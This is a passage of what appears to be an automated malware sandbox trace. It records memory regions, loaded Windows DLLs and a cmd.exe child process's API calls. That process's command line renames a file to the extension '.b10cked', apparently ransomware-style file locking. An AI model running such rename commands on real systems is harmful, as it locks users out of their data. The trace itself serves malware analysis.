pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19714 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19715 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19716 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 19717 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19718 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19719 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19720 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19721 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19722 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19723 start_va = 0x76a90000 end_va 
= 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19724 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19725 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19726 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19727 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19728 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19729 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 19730 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19731 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 300 os_tid = 0xbd0 Process: id = "238" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid 
= "0xcdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19746 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19747 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19748 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19749 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 19750 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19751 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19752 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" 
(normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19753 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19754 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 19755 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19829 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19830 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19831 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19832 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 19833 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 19834 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19835 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19836 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 19837 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19838 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19839 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19840 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19841 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19842 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19843 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19844 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19845 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19846 start_va = 0x190000 end_va = 0x196fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 19847 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 19848 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19849 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 19850 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 19851 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 19852 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Thread: id = 301 os_tid = 0x188 [0150.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efaec | out: lpSystemTimeAsFileTime=0x2efaec*(dwLowDateTime=0x93d4a3c0, dwHighDateTime=0x1d440a9)) [0150.824] GetCurrentProcessId () returned 0xcdc [0150.824] GetCurrentThreadId () returned 0x188 [0150.824] GetTickCount () returned 0x2ea10 [0150.824] QueryPerformanceCounter (in: lpPerformanceCount=0x2efae4 | out: lpPerformanceCount=0x2efae4*=20761361654) returned 1 [0150.825] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.825] __set_app_type (_Type=0x1) [0150.825] __p__fmode () returned 0x76b331f4 [0150.825] __p__commode () returned 0x76b331fc [0150.825] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.825] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.826] GetCurrentThreadId () 
returned 0x188 [0150.826] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x188) returned 0x38 [0150.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.826] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa7c | out: phkResult=0x2efa7c*=0x0) returned 0x2 [0150.827] VirtualQuery (in: lpAddress=0x2efab3, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0150.827] GetConsoleOutputCP () returned 0x1b5 
[0150.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.827] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.828] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.828] GetEnvironmentStringsW () returned 0x3e0168* [0150.828] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0150.829] GetEnvironmentStringsW () returned 0x3e0168* [0150.829] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0150.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9ec | out: phkResult=0x2ee9ec*=0x40) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x90, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, 
lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x0, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegCloseKey (hKey=0x40) returned 0x0 [0150.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9ec | out: phkResult=0x2ee9ec*=0x40) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x0, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x9, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x9, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x9, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.830] RegCloseKey (hKey=0x40) returned 0x0 [0150.830] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886379 [0150.830] srand (_Seed=0x5b886379) [0150.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"" [0150.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"" [0150.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.831] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.831] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.831] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.831] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.831] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.831] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.831] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.831] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.831] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.831] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.831] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.831] GetEnvironmentStringsW () returned 0x3e22b8* [0150.831] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0150.831] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.831] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.831] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.831] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.831] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.831] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.831] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.831] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.831] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0150.831] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.832] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef7b8, lpFilePart=0x2ef7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef7b4*="Desktop") returned 0x18 [0150.832] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.832] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef534 | out: lpFindFileData=0x2ef534) returned 0x3dfff8 [0150.832] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0150.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef534 | out: lpFindFileData=0x2ef534) returned 0x3dfff8 [0150.832] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0150.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef534 | out: lpFindFileData=0x2ef534) returned 0x3dfff8 [0150.832] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0150.833] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.833] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.833] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.833] GetEnvironmentStringsW () returned 0x3e2ad8* [0150.833] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0150.833] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.833] GetConsoleOutputCP () returned 0x1b5 [0150.834] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0150.834] GetUserDefaultLCID () returned 0x409 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef8f8, cchData=128 | out: lpLCData="0") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef8f8, cchData=128 | out: lpLCData="0") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef8f8, cchData=128 | out: lpLCData="1") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.835] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.836] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
